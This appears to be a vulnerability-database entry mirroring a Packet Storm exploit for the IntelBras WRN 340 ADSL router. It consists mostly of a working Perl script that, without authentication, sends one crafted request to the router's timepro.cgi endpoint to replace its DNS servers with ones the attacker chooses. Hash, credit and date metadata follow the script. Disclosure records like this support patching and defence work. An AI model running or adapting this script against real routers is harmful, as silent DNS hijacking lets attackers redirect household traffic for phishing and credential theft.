ID

VAR-E-201509-0396


TITLE

IntelBras WRN 340 Unauthenticated Remote DNS Changer

Trust: 0.5

sources: PACKETSTORM: 133625

DESCRIPTION

IntelBras WRN 340 (ADSL modem router) remote unauthenticated DNS changing exploit.

Trust: 0.5

sources: PACKETSTORM: 133625

AFFECTED PRODUCTS

vendor: intelbras, model: wrn, scope: eq, version: 340

Trust: 0.5

sources: PACKETSTORM: 133625

EXPLOIT

#!/usr/bin/perl
#
# IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit
#
# Discovered by:
#
# Gabriel P. Lipski - gp[DOT]lipski[AT]gmail[DOT]com
#
# Brazil, sept. 2015.
#
#
# WARNING:
#
# This program is for educational purposes only.
# DO NOT USE IT WITHOUT PERMISSION OF TARGET-NETWORK OWNER.
# Use at your own risk!

use LWP::UserAgent;
use HTTP::Request;

if($#ARGV < 2){
    print "IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit\n";
    print "Usage: ./$0 <ip> <dns-1> <dns-2>\n";
    exit;
}

if($ARGV[1] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS1 = $1; $DNS2 = $2; $DNS3 = $3; $DNS4 = $4; }

if($ARGV[2] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS5 = $1; $DNS6 = $2; $DNS7 = $3; $DNS8 = $4; }

$sock = new LWP::UserAgent;
$sock->timeout(5);
$http = new HTTP::Request GET => "http://".$ARGV[0]."/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=".$DNS1."&fdns_dynamic2=".$DNS2."&fdns_dynamic3=".$DNS3."&fdns_dynamic4=".$DNS4."&sdns_dynamic1=".$DNS5."&sdns_dynamic2=".$DNS6."&sdns_dynamic3=".$DNS7."&sdns_dynamic4=".$DNS8."&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=1500";
$response = $sock->request($http);

if($response->content =~ /Definir Servidor DNS Manualmente/){
    print "Successfully exploited!\n";
}
else {
    print "Unknown error.\n";
}

Trust: 0.5

sources: PACKETSTORM: 133625

EXPLOIT HASH

LOCAL

SOURCE

md5: 04b531d446fec2580433323d6d2d2b7b
sha-1: f5befa0d5ce69f475d6274a88b0bab883cffabca
sha-256: 17dc64fef14b3ce589e6d84108278318da8bf27f17e2823a9ea2fc50d8fc4ab6

Trust: 0.5

sources: PACKETSTORM: 133625

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 133625

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 133625

CREDITS

Gabriel P. Lipski

Trust: 0.5

sources: PACKETSTORM: 133625

EXTERNAL IDS

db: PACKETSTORM, id: 133625

Trust: 0.5

sources: PACKETSTORM: 133625

SOURCES

db: PACKETSTORM, id: 133625

LAST UPDATE DATE

2022-07-27T09:51:53.987000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM, id: 133625, date: 2015-09-21T00:51:20